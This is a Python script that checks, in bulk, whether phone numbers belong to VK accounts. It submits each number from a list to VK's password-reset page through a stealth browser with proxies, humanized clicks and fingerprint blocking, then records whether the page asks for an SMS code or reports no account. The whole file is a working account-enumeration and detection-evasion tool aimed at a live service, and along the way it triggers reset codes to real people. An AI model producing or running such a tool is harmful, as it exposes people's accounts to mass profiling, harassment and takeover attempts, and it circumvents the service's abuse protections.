import asyncio import os import traceback from concurrent.futures import ThreadPoolExecutor from threading import Lock from camoufox import AsyncCamoufox from envs import DEBUG, GEOIP, PROXY_HOST, PROXY_PSWD, PROXY_USER, THREADS LOCKER = Lock() RESULTS_FILE = "results.csv" NUMBERS_FILE = "numbers.txt" def replace_str(s: str) -> str: return ( "+" + ( s.replace(" ", "") .replace("-", "") .replace("+", "") .replace("(", "") .replace(")", "") ).strip() ) def get_numbers() -> list[str]: with open(NUMBERS_FILE, "r", encoding="utf-8") as f: return list(map(replace_str, f.read().splitlines())) def save_result(phone: str, result: str): with LOCKER: with open(RESULTS_FILE, "a", encoding="utf-8-sig") as f: f.write(f"{phone},{result}\n") def _main(phone: str): try: is_valid = asyncio.run(__main(phone)) except Exception: is_valid = "error" traceback.print_exc() save_result(phone, is_valid) async def __main(phone: str) -> str: is_valid = "unknown" proxy = None geoip = False if PROXY_HOST: proxy = {"server": f"http://{PROXY_HOST}"} if PROXY_USER and PROXY_PSWD: proxy["username"] = PROXY_USER proxy["password"] = PROXY_PSWD if GEOIP: geoip = True async with AsyncCamoufox( humanize=True, headless=bool(DEBUG), locale="en-US", block_images=True, block_webrtc=True, block_webgl=True, i_know_what_im_doing=True, geoip=geoip, proxy=proxy, ) as browser: page = await browser.new_page() await page.goto("https://id.vk.com/restore/#/resetPassword") await page.locator("//input[@name='login' or @name='phone']").fill(phone) await asyncio.sleep(1) await page.locator( "//button[@type='button' and @data-test-id='nextButton']" ).click() for _ in range(10): if await page.query_selector_all( "//*[contains(text(), 'Enter SMS confirmation code')]" ): is_valid = "valid" break if await page.query_selector_all( "//*[contains(text(), 'Account not found')]" ): is_valid = "invalid" break if await page.query_selector_all( "//*[contains(text(), 'Too many attempts')]" ): is_valid = "too_many_attempts" break await asyncio.sleep(1) return is_valid def main(): if os.path.exists(RESULTS_FILE): os.remove(RESULTS_FILE) if not os.path.exists(NUMBERS_FILE): with open(NUMBERS_FILE, "w", encoding="utf-8") as f: f.write("") return print( "File 'numbers.txt' not found. Please create it and add numbers to it." ) with ThreadPoolExecutor(max_workers=THREADS) as executor: executor.map(_main, get_numbers()) if __name__ == "__main__": main()